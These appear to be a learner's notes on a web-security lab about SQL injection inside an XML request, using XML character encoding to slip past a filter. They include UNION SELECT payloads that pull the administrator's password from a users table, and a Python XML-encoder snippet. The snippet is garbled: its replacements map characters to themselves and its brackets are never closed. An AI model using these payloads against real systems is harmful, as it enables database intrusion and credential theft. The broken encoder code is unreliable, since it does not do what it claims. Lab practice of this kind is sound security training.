Capture the request from BrupSuite (displaying some sort of XML)
Find the number of column (You can simply guest from the output of the original request)
trying to bypass some filter, you might see that simply encoding the request (URL might not work, this is because XML use a specific encoding (More information ---> HERE (opens in a new tab)))
- Also, here we are trying to encode character (this is different then simple url encoding)
- Using (HARACTER;), we can see that SQL injection is valid
Query Example
#Not Encoded
4 UNION SELECT password WHERE username='administator'--
4 UNION SELECT password FROM users WHERE username='administrator'-- 
Tool (Python)
XML encoder (Possible to modify it to encode character)
import xml.sax.saxutils
# Define the string to be encoded
string = "this is a string to be XML encoded"
# Encode the string using the escape() method
encoded_string = xml.sax.saxutils.escape(string, {
"'": "'", # Single quote
'"': """, # Double quote
"&": "&", # Ampersand
"<": "<", # Less than
">": ">", # Greater than
" ": " " # Space
# Print the encoded string